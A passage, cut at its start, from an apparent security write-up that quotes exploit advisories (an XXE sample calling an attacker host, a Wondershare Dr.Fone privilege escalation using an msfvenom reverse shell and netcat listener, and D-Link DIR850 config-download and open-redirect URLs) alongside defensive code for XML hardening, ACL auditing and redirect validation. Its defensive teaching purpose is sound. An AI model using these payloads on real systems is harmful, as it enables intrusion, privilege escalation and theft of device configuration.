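    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def is_rejected(data):
    """True when the document is refused, either as unsafe or as malformed."""
    try:
        parse_untrusted_xml(data)
    except (UnsafeXML, expat.ExpatError):
        return True
    return False


# Constructed samples.
XXE_BODY = (b'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM '
            b'"\\\\attackerwebsite.com\\XXE\\example">%remote;%int;%trick;]><root/>')
BENIGN_BODY = b'<?xml version="1.0" encoding="UTF-8"?><attrs><attr name="userName">alice</attr></attrs>'
```

Rejecting DOCTYPE outright also disposes of internal-entity expansion attacks ("billion laughs") in the same place. In a Java service such as the one in the advisory the equivalent switch is the parser feature that disallows the doctype declaration; whichever stack is in use, the rule is that an endpoint taking XML from clients should never need a DTD, so the parser should treat one as an error rather than as an instruction.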
<pre><code># Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit

# Note: The application folder "Wondershare Dr.Fone" may be different (e.g. it will be "drfone" if we download the installer from the Italian website)

# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist

All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.

First, we need to check whether the services are running, using the following command:
wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

Wondershare WSID help                DFWSIDService               C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                          Auto  LocalSystem  Running
Wondershare Driver Install Service help  ElevationService        C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe  Auto  LocalSystem  Running
Wondershare Install Assist Service   Wondershare InstallAssist   C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                     Auto  LocalSystem  Running

Now we need to check whether we have enough privileges to replace the binaries:

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F) <= same here
...

icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F) <= and here
...


# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait for the next reboot (unless the service can be restarted manually)

As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>
</code></pre>
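The `icacls` output above is read by eye for an `Everyone ... (F)` entry. The following is an added example (not the advisory author's code) of the same review automated for a fleet audit: parse `icacls` output for a service binary's directory and report every ACE that gives a broad principal (Everyone, Users, Authenticated Users, INTERACTIVE) a right that allows replacing or modifying files. The sample output is constructed: its `Everyone` line is the one the advisory shows, the remaining ACEs are typical filler added so the filter has something to ignore.

```python
import re

# icacls output in the layout Windows prints: the first ACE shares a line with the path.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Everyone:(OI)(CI)(F)
                                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                       BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that amount to "any local user" for privilege-escalation purposes. The optional
# "DOMAIN\" prefix accepts BUILTIN\Users and NT AUTHORITY\Authenticated Users spellings.
BROAD_PRINCIPAL = re.compile(
    r"(?:^|\s)(?P<principal>(?:[A-Za-z ]+\\)?(?:Everyone|Users|Authenticated Users|INTERACTIVE))\s*$",
    re.IGNORECASE,
)
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple rights (F, M, W) and specific rights that let the holder replace or modify files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "DE", "WDAC", "WO"}


def parse_icacls(output):
    """Yield (text_before_rights, [flags]) for each ACE line; summary lines carry no ':(' and are skipped."""
    for line in output.splitlines():
        idx = line.rfind(":(")
        if idx < 0:
            continue
        principal_part, perms_part = line[:idx], line[idx + 1:]
        yield principal_part, re.findall(r"\(([^)]*)\)", perms_part)


def weak_aces(output):
    """Return (principal, flags) for every ACE granting write-capable rights to a broad principal."""
    findings = []
    for principal_part, flags in parse_icacls(output):
        m = BROAD_PRINCIPAL.search(principal_part)
        if not m:
            continue
        # Specific rights are printed comma-separated inside one pair of parentheses, e.g. (RX,WD).
        rights = {r for f in flags if f not in INHERITANCE_FLAGS for r in f.split(",")}
        if rights & WRITE_RIGHTS:
            findings.append((m.group("principal").strip(), flags))
    return findings
```

A finding here on a directory that holds a `LocalSystem` service binary is the condition the advisory describes. The fix is on the ACL, not the service: reset the directory to the installer-default pattern, for example `icacls "<dir>" /inheritance:r /grant:r "BUILTIN\Administrators:(OI)(CI)F" "NT AUTHORITY\SYSTEM:(OI)(CI)F" "BUILTIN\Users:(OI)(CI)RX"`, and keep `C:\ProgramData` service directories to the same standard, since that location is writable by users by default and is easy to overlook.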
<pre><code># Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

# Exploit :
Visit http://<IP Address>/config.dat
</code></pre>
<pre><code># Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

# Exploit :
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
</code></pre>
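The `formWlanRedirect` handler above sends the browser wherever `redirect-url` says. The following is an added example (not D-Link firmware code) of the validation a redirect parameter should go through in any web handler: keep only rooted local paths, reject protocol-relative and backslash variants that browsers treat as absolute, and allow an absolute URL only for http(s) to an explicitly listed host with no userinfo. Anything else falls back to a fixed default. The allow-listed address in the test is constructed.

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def safe_redirect_target(candidate, allowed_hosts=frozenset(), default="/"):
    """Return `candidate` if it is a local path or points at an allow-listed host, else `default`."""
    if not isinstance(candidate, str) or not candidate:
        return default
    # Whitespace, control characters and backslashes are interpreted differently by browsers
    # and by URL parsers ("/\host" becomes "//host" in a browser), so refuse them outright.
    if any(ch.isspace() or ord(ch) < 32 or ch == "\\" for ch in candidate):
        return default
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        # Absolute (or protocol-relative) URL: only http(s), no userinfo,
        # and the host must be on the allow list.
        if parsed.scheme.lower() not in ALLOWED_SCHEMES:
            return default
        if parsed.username is not None or parsed.password is not None:
            return default
        host = (parsed.hostname or "").lower()
        if host not in {h.lower() for h in allowed_hosts}:
            return default
        return candidate
    # Relative target: a rooted path on this origin, never "//..." which browsers treat as a host.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate
```

For a device web UI such as this router's, the allow list can normally be empty: every legitimate post-action redirect is a page on the device itself, so a rooted path is all the handler ever needs to accept.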